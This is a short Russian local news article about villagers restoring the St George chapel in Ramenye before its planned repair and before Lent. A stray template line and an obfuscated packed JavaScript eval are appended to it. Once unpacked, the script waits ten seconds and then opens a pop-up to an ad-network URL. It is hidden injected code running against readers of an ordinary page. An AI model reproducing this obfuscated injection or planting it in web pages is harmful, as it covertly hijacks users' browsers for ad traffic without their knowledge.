Не дожидаясь капитального ремонта

В каждый день приходят люди к камню со следом Пресвятой Богородицы поклониться Царице Небесной и многие, наверное, не подозревают, что в Раменье есть еще одна величайшая святыня — часовня Георгия победоносца.
Летом планируется капитальный ремонт исторического строения, заменят потолок, крышу, достроят шпиль с башенкой и крестом.


Готовится проект ТОСа для привлечения финансовых средств из государственной казны.
Не дожидаясь капитального ремонта, местные жители вставили стекла в сохранившиеся оконные рамы, где не было рам подобрали по размеру другие. Навели порядок в помещении, повесили иконы, поставили на крыше крест.
Уже сейчас можно приходить в часовню и возносить молитву к Богу. На святом намоленном веками месте наши воздыхания и просьбы наверняка будут услышаны Господом.


Через неделю наступает Великий пост. В деревне Раменье теперь есть место, где можно покаяться и помолиться Всевышнему.

Please publish modules in offcanvas position.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('<5>4 n="c://b.a.9/8?7=6";4 2=d;e 3(){f(2>0){2--;4 g=2+1;i("3()",j)}h{k.l("c://b.a.9/8?7=6","m")}}3();',24,24,'||count|countDown|var|script|688b0be27b4d45d6562eba71df5c7886|key|ef4ex511a|com|effectivecpmnetwork|www|https|10|function|if|waktu|else|setTimeout|1000|window|open|_0|url'.split('|'),0,{}))